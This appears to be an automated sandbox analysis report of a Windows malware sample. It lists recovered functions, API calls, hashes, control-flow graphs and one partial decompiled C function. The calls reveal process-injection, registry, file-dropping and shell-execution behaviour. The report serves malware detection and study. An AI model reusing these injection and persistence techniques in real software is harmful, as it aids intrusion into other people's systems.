                      • API String ID: 2207238129-0
                      • Opcode ID: 5f8fa202f48bd84e7cf034c4e9114294dff4325234a1e61f2c5ab90c3ac1a797
                      • Instruction ID: a0f8a367c8e24ceadb33ec732282025a75c97f94ffe6506d33be5bf2af5ac1f4
                      • Opcode Fuzzy Hash: 5f8fa202f48bd84e7cf034c4e9114294dff4325234a1e61f2c5ab90c3ac1a797
                      • Instruction Fuzzy Hash: C831637190030AAFDB21DF65C885A9ABBF8FF14324F14456EE94AE7264D730EA458B50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0141271B, Relevance: 6.1, APIs: 4, Instructions: 79nativeCOMMON
                      Download Yara Rule
                      APIs
                      • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01412776
                      • memset.NTDLL ref: 0141279B
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 014127B7
                      • NtClose.NTDLL(?), ref: 014127CB
                        • Part of subcall function 014126DC: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01412709
                        • Part of subcall function 014126DC: RtlNtStatusToDosError.NTDLL(00000000), ref: 01412710
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: ErrorSectionStatus$CloseCreateViewmemset
                      • String ID:
                      • API String ID: 783833395-0
                      • Opcode ID: 7bd71f428264f17f6e17c226e9eadbe784206940375a885c993c7ab6ad5b4067
                      • Instruction ID: 2a8c681b4074889cf648bad49ae082f5cef436b44011e05c1ac9b7162293093e
                      • Opcode Fuzzy Hash: 7bd71f428264f17f6e17c226e9eadbe784206940375a885c993c7ab6ad5b4067
                      • Instruction Fuzzy Hash: 17213E7190021DAFDB11DF98C8849EFBBB9FF08710F200516F911E7258D7B196548BA5
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01413D34, Relevance: 4.5, APIs: 3, Instructions: 29memorynativeCOMMON
                      Download Yara Rule
                      APIs
                      • NtAllocateVirtualMemory.NTDLL(014137D3,00000000,00000000,014137D3,00003000,00000040), ref: 01413D65
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 01413D6C
                      • SetLastError.KERNEL32(00000000), ref: 01413D73
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Error$AllocateLastMemoryStatusVirtual
                      • String ID:
                      • API String ID: 722216270-0
                      • Opcode ID: 6613021b3aee33a65cdafc998740588a1d051fe661c8063a1a67b54a6f35858a
                      • Instruction ID: 53ef94adc51a77e1d3e8412ab15288f13f8f8f4d7faf1799e403ac07c68b6560
                      • Opcode Fuzzy Hash: 6613021b3aee33a65cdafc998740588a1d051fe661c8063a1a67b54a6f35858a
                      • Instruction Fuzzy Hash: 1FF0FEB1910309FBEB15CB95D909FAE7BBCAB14359F504048B600A6194DBB4EB04DB64
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01413CF3, Relevance: 4.5, APIs: 3, Instructions: 26nativeCOMMON
                      Download Yara Rule
                      APIs
                      • NtWriteVirtualMemory.NTDLL(?,00000004,0141244E,0141244E,00000000,014160F0,?,014119D6,?,00000004,0141244E,00000004,?), ref: 01413D11
                      • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01413D20
                      • SetLastError.KERNEL32(00000000,?,014119D6,?,00000004,0141244E,00000004,?,?,?,?,014122FD,00000000,0141244E,CCCCFEEB,00000000), ref: 01413D27
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Error$LastMemoryStatusVirtualWrite
                      • String ID:
                      • API String ID: 1089604434-0
                      • Opcode ID: c302869a32487cc0d9746d216dd6763f892ba157f055dd7bc8bc5e18cc5fa474
                      • Instruction ID: 734fbbc469a573b292f41ad0a94c4381bab0825f9480b958f8146dfacd7019f6
                      • Opcode Fuzzy Hash: c302869a32487cc0d9746d216dd6763f892ba157f055dd7bc8bc5e18cc5fa474
                      • Instruction Fuzzy Hash: 25E04F3620021AABDF115EE8EC04D9B7F6DBB18761F414011BF15C2135C731C862DBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01413CB2, Relevance: 4.5, APIs: 3, Instructions: 26nativeCOMMON
                      Download Yara Rule
                      APIs
                      • NtReadVirtualMemory.NTDLL(?,00000004,0141244E,0141244E,00000000,00000000,?,014122DE,00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C), ref: 01413CD0
                      • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01413CDF
                      • SetLastError.KERNEL32(00000000,?,014122DE,00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C,00000000), ref: 01413CE6
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Error$LastMemoryReadStatusVirtual
                      • String ID:
                      • API String ID: 4030520765-0
                      • Opcode ID: d250017a3dc8a667b3b4df2d9cc7db363a5101cd5da3e98c74f3233e0130f078
                      • Instruction ID: f1374ba557926816b179dadfc5ef06bd585cf60e85b1413e1ce2092fe14170de
                      • Opcode Fuzzy Hash: d250017a3dc8a667b3b4df2d9cc7db363a5101cd5da3e98c74f3233e0130f078
                      • Instruction Fuzzy Hash: A9E0BF3760021AABDF115EEADD04D9B7F6DBB18761B014025BF05D2135D772D861EBE0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01413C1B, Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 01411174: HeapFree.KERNEL32(00000000,?,01413C0E), ref: 01411180
                        • Part of subcall function 0141115F: RtlAllocateHeap.NTDLL(00000000,?,01413BA9), ref: 0141116B
                      • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 01413C4C
                      • RtlNtStatusToDosError.NTDLL(C000009A), ref: 01413C85
                        • Part of subcall function 014114BA: RtlUpcaseUnicodeString.NTDLL(?,0141764C,00000001), ref: 014114E6
                        • Part of subcall function 014114BA: RtlFreeAnsiString.NTDLL(?), ref: 01411564
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: FreeHeapString$AllocateAnsiErrorInformationQueryStatusSystemUnicodeUpcase
                      • String ID:
                      • API String ID: 1666562127-0
                      • Opcode ID: f9c7b6c615f56a78488bd1080aa9f9135bf1a01121642c3834811418eb479066
                      • Instruction ID: ff5d5adcce7ed74c3f1178bd2a8c4022db2477b40ef5c508a466b6c6c5f92ccc
                      • Opcode Fuzzy Hash: f9c7b6c615f56a78488bd1080aa9f9135bf1a01121642c3834811418eb479066
                      • Instruction Fuzzy Hash: 3701DB77902521AAEB315F6B8904AAFE969AF56E64F06011AEF0563338F770890186D0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 014126DC, Relevance: 3.0, APIs: 2, Instructions: 28nativeCOMMON
                      Download Yara Rule
                      APIs
                      • NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01412709
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 01412710
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: ErrorSectionStatusView
                      • String ID:
                      • API String ID: 1313840181-0
                      • Opcode ID: 350883369f9230d411cfd086ddd0c7395b90a8620823851d8fc76dc8a3c476f1
                      • Instruction ID: c914e7775150ae55e597907330cb421947e53d351667242d032fb93aa7b3e959
                      • Opcode Fuzzy Hash: 350883369f9230d411cfd086ddd0c7395b90a8620823851d8fc76dc8a3c476f1
                      • Instruction Fuzzy Hash: 25E0EDB6900208FFEF059F94DC0FDEF7B7DEB44300F00856ABA15A6155E6B0AA18DB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01412EC0, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 252registrystringmemoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • StrChrA.SHLWAPI(01414321,0000005F), ref: 01412F03
                      • lstrcpy.KERNEL32(?,01414321), ref: 01412F1B
                      • RegOpenKeyA.ADVAPI32(?,?,?), ref: 01412F51
                      • RegQueryValueExW.KERNEL32(?,014181C0,00000000,?,00000000,01414321), ref: 01412F77
                      • lstrlenW.KERNEL32 ref: 01412F88
                      • RtlAllocateHeap.NTDLL(00000000,01414357), ref: 01412F9D
                      • RegQueryValueExW.KERNEL32(?,014181C0,00000000,?,00000000,01414321), ref: 01412FC2
                      • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01412FE8
                      • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01412FFA
                      • lstrcmpiW.KERNEL32(00000000), ref: 01413011
                      • HeapFree.KERNEL32(00000000,01414321,?), ref: 01413196
                        • Part of subcall function 014141F8: lstrlenW.KERNEL32(00000000,?,?,01413030,00000000,?), ref: 0141420B
                        • Part of subcall function 014141F8: lstrlen.KERNEL32(01413030,?,01413030,00000000,?), ref: 01414216
                        • Part of subcall function 014141F8: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 0141422B
                        • Part of subcall function 014141F8: wsprintfW.USER32 ref: 01414243
                        • Part of subcall function 014144D4: lstrlenW.KERNEL32(01413038,?,00000000,?,?,01413038,00000000), ref: 014144DD
                        • Part of subcall function 014144D4: memcpy.NTDLL(00000000,01413038,00000000,00000000,?,?,?,01413038,00000000), ref: 01414507
                        • Part of subcall function 014144D4: memset.NTDLL ref: 0141451B
                      • lstrcpy.KERNEL32(?,014180FA), ref: 01413053
                        • Part of subcall function 01412BE1: CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000004,00000080,00000000,?,?,00000000,?,01413082,?,?,?), ref: 01412C1D
                        • Part of subcall function 01412BE1: WriteFile.KERNELBASE(?,?,?,01413082,00000000,?,01413082,?,?,?), ref: 01412C43
                        • Part of subcall function 01412BE1: WriteFile.KERNELBASE(?,?,?,01413082,00000000,?,01413082,?,?,?), ref: 01412C5C
                        • Part of subcall function 01412BE1: GetLastError.KERNEL32(?,01413082,?,?,?), ref: 01412C62
                        • Part of subcall function 01412BE1: SetEndOfFile.KERNELBASE(?,?,01413082,?,?,?), ref: 01412C6E
                        • Part of subcall function 01412BE1: CloseHandle.KERNEL32(?), ref: 01412C77
                        • Part of subcall function 01412BE1: GetLastError.KERNEL32(?,01413082,?,?,?), ref: 01412C7F
                        • Part of subcall function 01412BE1: CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,01413082,?,?,?), ref: 01412C9E
                        • Part of subcall function 01412BE1: WriteFile.KERNELBASE(00000000,?,?,01413082,00000000,?,01413082,?,?,?), ref: 01412CB4
                        • Part of subcall function 01412BE1: GetLastError.KERNEL32(?,01413082,?,?,?), ref: 01412CBA
                        • Part of subcall function 01412BE1: FlushFileBuffers.KERNEL32(00000000), ref: 01412CC4
                        • Part of subcall function 01412BE1: GetLastError.KERNEL32(?,01413082,?,?,?), ref: 01412CCC
                      • lstrcpy.KERNEL32(?,?), ref: 014130AC
                      • RegCreateKeyA.ADVAPI32(?,?,?), ref: 014130C0
                      • RegQueryValueExA.KERNEL32(?,01418256,00000000,?,?,01414321), ref: 014130E3
                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?,?,?,?), ref: 01413146
                      • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01413161
                      • RegDeleteValueW.ADVAPI32(?,014176D0), ref: 0141316F
                      • RegCloseKey.ADVAPI32(?), ref: 01413178
                      • RegCloseKey.ADVAPI32(?), ref: 01413181
                      • HeapFree.KERNEL32(00000000,00000000), ref: 014131B9
                      • RegCloseKey.ADVAPI32(?), ref: 014131CB
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: File$Create$CloseErrorHeapLastValuelstrlen$OpenQueryWritelstrcpy$AllocateDirectoryFree$BuffersDeleteFlushHandlelstrcmpimemcpymemsetwsprintf
                      • String ID: (
                      • API String ID: 1564632544-3887548279
                      • Opcode ID: 1a38ba26e3e0a01cb3276bc36ce3c62e736cbc250f54ff09a52783f1d8f8d93c
                      • Instruction ID: 37342f20720eda081279f15aadd8ccd52218fe64ebe70db543d8a2c77bbb9cfb
                      • Opcode Fuzzy Hash: 1a38ba26e3e0a01cb3276bc36ce3c62e736cbc250f54ff09a52783f1d8f8d93c
                      • Instruction Fuzzy Hash: C09136B190020AFFDF22DF95DC88DAF7FB9FB04351B11446AFA05A2228D7709A55DB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0141168A, Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238timesleepfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 53 141168a-14116b4 call 14129a4 56 1411985-141198b 53->56 57 14116ba-14116c9 53->57 58 1411994-141199c 56->58 59 141198d-141198e ExitProcess 56->59 61 14116ca-14116da WaitForSingleObject 57->61 62 1411705-1411707 61->62 63 14116dc-14116f9 call 1414365 61->63 62->56 64 141170d-141171a call 1413223 62->64 69 14116fe-1411703 63->69 70 141171c-1411726 64->70 71 141172e-1411733 64->71 69->61 69->62 70->71 72 1411741 call 1412a10 71->72 73 1411735-141173f call 1411574 71->73 77 1411746-141174c 72->77 73->77 78 1411767-141176d 77->78 79 141174e-1411758 call 14115fb 77->79 81 1411786-14117a5 call 141144f call 1412b45 78->81 82 141176f-141177c 78->82 83 141175d-1411761 79->83 91 14117a7-14117b9 call 1412b45 81->91 92 14117bf-14117d2 call 1413d84 81->92 82->81 84 141177e 82->84 83->78 86 1411978-141197b 83->86 84->81 86->56 88 141197d-1411983 GetLastError 86->88 88->56 91->88 91->92 92->86 97 14117d8-14117df call 1411189 92->97 97->56 100 14117e5-14117e9 97->100 101 14117f2 100->101 102 14117eb-14117f0 100->102 103 14117f7-1411809 lstrcatW 101->103 102->103 104 1411814-1411819 call 1413e06 103->104 105 141180b call 1411227 103->105 108 141181e-1411820 104->108 109 1411810-1411812 105->109 110 141185b-1411866 call 141131a 108->110 111 1411822-141182a 108->111 109->104 109->110 119 1411868-141186a 110->119 120 141186c-14118a7 call 1414f04 CreateEventA 110->120 111->110 112 141182c-1411832 111->112 114 1411834-1411848 call 1412cdf 112->114 115 141184a-1411853 call 1412d8c 112->115 114->110 114->115 121 1411855-1411856 115->121 119->121 126 14118d3-14118f6 call 1414253 120->126 127 14118a9-14118b1 GetLastError 120->127 121->56 132 14118f8-14118fa 126->132 133 141191f-1411924 call 1413c1b 126->133 128 14118b3-14118c6 SetEvent Sleep ResetEvent 127->128 129 14118cc-14118cd CloseHandle 127->129 128->129 129->126 134 141196c-1411976 LocalFree 132->134 135 14118fc-1411903 132->135 138 1411929-141192d 133->138 134->86 135->133 137 1411905-141190e DeleteFileW 135->137 137->133 140 1411910-1411919 MoveFileExW 137->140 138->86 139 141192f-1411946 CreateWaitableTimerA 138->139 139->134 141 1411948-1411966 SetWaitableTimer CloseHandle 139->141 140->133 141->134
                      APIs
                        • Part of subcall function 014129A4: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01417614,014116B0,?,01417614), ref: 014129B3
                        • Part of subcall function 014129A4: GetVersion.KERNEL32(?,01417614), ref: 014129C2
                        • Part of subcall function 014129A4: GetCurrentProcessId.KERNEL32(?,01417614), ref: 014129D1
                        • Part of subcall function 014129A4: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01417614), ref: 014129EA
                      • WaitForSingleObject.KERNEL32(00000040), ref: 014116D2
                        • Part of subcall function 01413223: OpenProcess.KERNEL32(00000400,00000000,01417614,0141618C,0000000C,?,?,01411718,00000000,?,01417614), ref: 0141323E
                        • Part of subcall function 01413223: IsWow64Process.KERNELBASE(01417624,?,0141618C,0000000C,?,?,01411718,00000000,?,01417614), ref: 0141324F
                        • Part of subcall function 01413223: CloseHandle.KERNEL32(01417624), ref: 01413262
                      • CloseHandle.KERNEL32(00000000), ref: 01411966
                        • Part of subcall function 014115FB: CreateFileW.KERNELBASE(0141763C,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01411611
                        • Part of subcall function 014115FB: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01417614), ref: 01411627
                        • Part of subcall function 014115FB: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01417614), ref: 0141163F
                        • Part of subcall function 014115FB: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01417614), ref: 01411651
                        • Part of subcall function 014115FB: GetLastError.KERNEL32(?,00000000,?,01417614), ref: 0141165F
                        • Part of subcall function 014115FB: GetLastError.KERNEL32(?,00000000,?,01417614), ref: 0141166C
                        • Part of subcall function 014115FB: GetLastError.KERNEL32(?,01417614), ref: 0141167B
                        • Part of subcall function 0141144F: LoadLibraryA.KERNEL32(USER32.DLL), ref: 0141145E
                        • Part of subcall function 0141144F: GetModuleHandleA.KERNEL32(USER32.DLL,01418000,?,?,0141178B,00000000,?,01417614), ref: 01411484
                        • Part of subcall function 0141144F: FindWindowA.USER32(01418640,00000000,?,?,0141178B,00000000,?,01417614), ref: 0141149A
                        • Part of subcall function 0141144F: GetWindowThreadProcessId.USER32(00000000,00000000,?,?,0141178B,00000000,?,01417614), ref: 014114A5
                      • GetLastError.KERNEL32(pnls,00000000,?,01417614), ref: 0141197D
                        • Part of subcall function 01411189: HeapFree.KERNEL32(00000000,?,Local\), ref: 0141121A
                      • lstrcatW.KERNEL32(014184B8,pnls), ref: 014117FD
                      • LocalFree.KERNEL32(?), ref: 01411970
                        • Part of subcall function 01411227: PathFindFileNameW.SHLWAPI(0141618C), ref: 01411249
                        • Part of subcall function 01411227: lstrcmpiW.KERNELBASE(00000000,?,01417614), ref: 01411250
                        • Part of subcall function 01411227: RegOpenKeyExA.KERNEL32(80000001,01418080,00000000,00000000,?,?,01417614), ref: 01411281
                        • Part of subcall function 01411227: lstrlenW.KERNEL32(?,01417614), ref: 01411295
                        • Part of subcall function 01411227: RtlAllocateHeap.NTDLL(00000000,?), ref: 014112AD
                        • Part of subcall function 01411227: RegQueryValueExW.KERNEL32(?,00000000,01417614,00000000,01417614,?,01417614), ref: 014112CC
                        • Part of subcall function 01411227: StrStrIW.SHLWAPI(00000000), ref: 014112E9
                        • Part of subcall function 01411227: HeapFree.KERNEL32(00000000,00000000), ref: 014112FE
                        • Part of subcall function 01411227: RegCloseKey.ADVAPI32(?,?,01417614), ref: 01411307
                        • Part of subcall function 01413E06: OpenProcessToken.ADVAPI32(000000FF,00020008,01417614,00000000), ref: 01413E38
                        • Part of subcall function 01413E06: GetTokenInformation.KERNELBASE(01417614,00000014,00000001,00000004,?,00000000), ref: 01413E58
                        • Part of subcall function 01413E06: GetTokenInformation.KERNELBASE(01417614,00000019,00000000,00000000,?), ref: 01413E68
                        • Part of subcall function 01413E06: GetTokenInformation.KERNELBASE(01417614,00000019,00000000,?,?,?,0141618C), ref: 01413E8B
                        • Part of subcall function 01413E06: GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01413E93
                        • Part of subcall function 01413E06: GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01413EA3
                        • Part of subcall function 01413E06: CloseHandle.KERNEL32(01417614), ref: 01413EB8
                        • Part of subcall function 01412D8C: memset.NTDLL ref: 01412DAA
                        • Part of subcall function 01412D8C: CoInitializeEx.OLE32(00000000,00000002), ref: 01412DB5
                        • Part of subcall function 01412D8C: PathFindExtensionW.SHLWAPI(00000000), ref: 01412DD0
                        • Part of subcall function 01412D8C: lstrcpyW.KERNEL32(00000000,01418224), ref: 01412DE5
                        • Part of subcall function 01412D8C: lstrlen.KERNEL32(01417614,?,?,?,?,?,?,?,?,?,?,01411853,?), ref: 01412E02
                        • Part of subcall function 01412D8C: lstrcpyW.KERNEL32(00000000,014184B8), ref: 01412E33
                        • Part of subcall function 01412D8C: wsprintfW.USER32 ref: 01412E6A
                        • Part of subcall function 01412D8C: ShellExecuteExW.SHELL32(0000003C), ref: 01412E9F
                        • Part of subcall function 01412D8C: CoUninitialize.OLE32 ref: 01412EB3
                        • Part of subcall function 01412CDF: lstrlenW.KERNEL32(00000000,00000000,01417614,?,00001FD1,00000000,00000000,?,?,01411841,?,?), ref: 01412D1A
                        • Part of subcall function 01412CDF: PathFindFileNameW.SHLWAPI(00000000), ref: 01412D32
                        • Part of subcall function 01412CDF: lstrcatW.KERNEL32(00000000,?), ref: 01412D5B
                        • Part of subcall function 0141131A: memset.NTDLL ref: 01411323
                        • Part of subcall function 0141131A: HeapFree.KERNEL32(00000000,?,?), ref: 01411392
                      • CreateEventA.KERNEL32(?,00000001,00000000), ref: 01411898
                      • GetLastError.KERNEL32 ref: 014118A9
                      • SetEvent.KERNEL32(00000000), ref: 014118B4
                      • Sleep.KERNEL32(00000BB8), ref: 014118BF
                      • ResetEvent.KERNEL32(00000000), ref: 014118C6
                      • CloseHandle.KERNEL32(00000000), ref: 014118CD
                        • Part of subcall function 01414253: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,00000001,00000000,000000B7,00000001,?,00000000,?,?,01417614), ref: 0141427A
                        • Part of subcall function 01414253: RegEnumKeyExA.KERNEL32(00000000,?,00000000,01417614,00000000,00000000,00000000,00000000,00000104,00000000,?,01417614), ref: 014142C1
                        • Part of subcall function 01414253: WaitForSingleObject.KERNEL32(00000000,?), ref: 0141432E
                        • Part of subcall function 01414253: RegCloseKey.ADVAPI32(?,00000104,00000000,?,01417614), ref: 01414356
                      • DeleteFileW.KERNELBASE(0141763C,?), ref: 01411906
                      • MoveFileExW.KERNEL32(00000000,00000004), ref: 01411919
                        • Part of subcall function 01413C1B: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 01413C4C
                        • Part of subcall function 01413C1B: RtlNtStatusToDosError.NTDLL(C000009A), ref: 01413C85
                      • CreateWaitableTimerA.KERNEL32(?,00000001,?), ref: 0141193C
                      • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0141195F
                        • Part of subcall function 01414365: lstrcpyn.KERNEL32(014116FE,014161F4,00000008,0141618C,0000000C,00000000,?,?,?,014116FE,?,?,01417614), ref: 01414393
                        • Part of subcall function 01414365: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,014116FE,?,?,01417614), ref: 01414406
                        • Part of subcall function 01414365: memcpy.NTDLL(?,00000000,?,?,01417614,00000001,?,?,?,014116FE,?,?,01417614), ref: 0141444F
                        • Part of subcall function 01414365: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,01417614,00000001,?,?,?,014116FE,?), ref: 01414468
                      • ExitProcess.KERNEL32 ref: 0141198E
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: File$Process$CloseError$CreateFreeHandleLastOpen$EventFindHeapInformationToken$Pathlstrlen$AuthorityNameObjectQuerySingleTimerVirtualWaitWaitableWindowlstrcatlstrcpymemset$AllocAllocateCountCurrentDeleteEnumExecuteExitExtensionInitializeLibraryLoadLocalMappingModuleMoveResetShellSizeSleepStatusSystemThreadUninitializeValueVersionViewWow64lstrcmpilstrcpynmemcpywsprintf
                      • String ID: pnls
                      • API String ID: 348821020-141991303
                      • Opcode ID: 6664c124fe14476b25b4814e684dde4cd510ca4833dda5a84943fd6c6b21149b
                      • Instruction ID: e66ff923b8bd2e3dcd0329a736682125043192577e990bbfccfd252e77e6a9a3
                      • Opcode Fuzzy Hash: 6664c124fe14476b25b4814e684dde4cd510ca4833dda5a84943fd6c6b21149b
                      • Instruction Fuzzy Hash: E281D0B25043029FDB20AF79DC88A6B7BB9AB54B20F01492EFB55D627CDB70C844CB51
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01412BE1, Relevance: 18.1, APIs: 12, Instructions: 98fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 186 1412be1-1412bfb 187 1412c00-1412c2b CreateFileW 186->187 188 1412bfd 186->188 189 1412c2d-1412c47 WriteFile 187->189 190 1412c7f-1412c85 GetLastError 187->190 188->187 191 1412c62-1412c68 GetLastError 189->191 192 1412c49-1412c60 WriteFile 189->192 193 1412c88-1412c8d 190->193 196 1412c6b-1412c7d SetEndOfFile CloseHandle 191->196 192->191 192->196 194 1412cd5-1412cdc 193->194 195 1412c8f-1412ca5 CreateFileW 193->195 197 1412ca7-1412cb8 WriteFile 195->197 198 1412ccc-1412cd2 GetLastError 195->198 196->193 199 1412cc3-1412cca FlushFileBuffers 197->199 200 1412cba-1412cc0 GetLastError 197->200 198->194 199->194 200->199
                      APIs
                      • CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000004,00000080,00000000,?,?,00000000,?,01413082,?,?,?), ref: 01412C1D
                      • WriteFile.KERNELBASE(?,?,?,01413082,00000000,?,01413082,?,?,?), ref: 01412C43
                      • WriteFile.KERNELBASE(?,?,?,01413082,00000000,?,01413082,?,?,?), ref: 01412C5C
                      • GetLastError.KERNEL32(?,01413082,?,?,?), ref: 01412C62
                      • SetEndOfFile.KERNELBASE(?,?,01413082,?,?,?), ref: 01412C6E
                      • CloseHandle.KERNEL32(?), ref: 01412C77
                      • GetLastError.KERNEL32(?,01413082,?,?,?), ref: 01412C7F
                      • CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,01413082,?,?,?), ref: 01412C9E
                      • WriteFile.KERNELBASE(00000000,?,?,01413082,00000000,?,01413082,?,?,?), ref: 01412CB4
                      • GetLastError.KERNEL32(?,01413082,?,?,?), ref: 01412CBA
                      • FlushFileBuffers.KERNEL32(00000000), ref: 01412CC4
                      • GetLastError.KERNEL32(?,01413082,?,?,?), ref: 01412CCC
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: File$ErrorLast$Write$Create$BuffersCloseFlushHandle
                      • String ID:
                      • API String ID: 2625730619-0
                      • Opcode ID: 7e84ebfecaf1f660278f7a971d47815a8f4b37528e9c1e97b8c836477edf95e9
                      • Instruction ID: b4cecd15b7adb10f694ea5831447a2b7dd17809c60c2963ac3fb8e3c17a4adc7
                      • Opcode Fuzzy Hash: 7e84ebfecaf1f660278f7a971d47815a8f4b37528e9c1e97b8c836477edf95e9
                      • Instruction Fuzzy Hash: 7A312F71900209FFEB10DFA4CD45EAEBF79EB48750F118155FA11E72A4E7B09A419B60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00401649, Relevance: 16.6, APIs: 11, Instructions: 85threadsynchronizationCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      C-Code - Quality: 100%
                      			E00401649(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x403268 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E004015A3( &_v28); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}












                      0x00401657
                      0x0040165f
                      0x00401674
                      0x0040167e
                      0x00401680
                      0x00401685
                      0x00401723
                      0x0040168b
                      0x0040169c
                      0x0040169e
                      0x004016a0
                      0x004016a5
                      0x0040170e
                      0x004016a7
                      0x004016b0
                      0x004016b3
                      0x004016c4
                      0x004016f7
                      0x004016cb
                      0x004016d0
                      0x004016dd
                      0x004016e7
                      0x004016ec
                      0x004016ec
                      0x004016dd
                      0x00401700
                      0x00401700
                      0x00401714
                      0x0040171a
                      0x0040172c

                      APIs
                      • CreateThread.KERNELBASE(00000000,00000000,00401034,?,00000000,?), ref: 0040167E
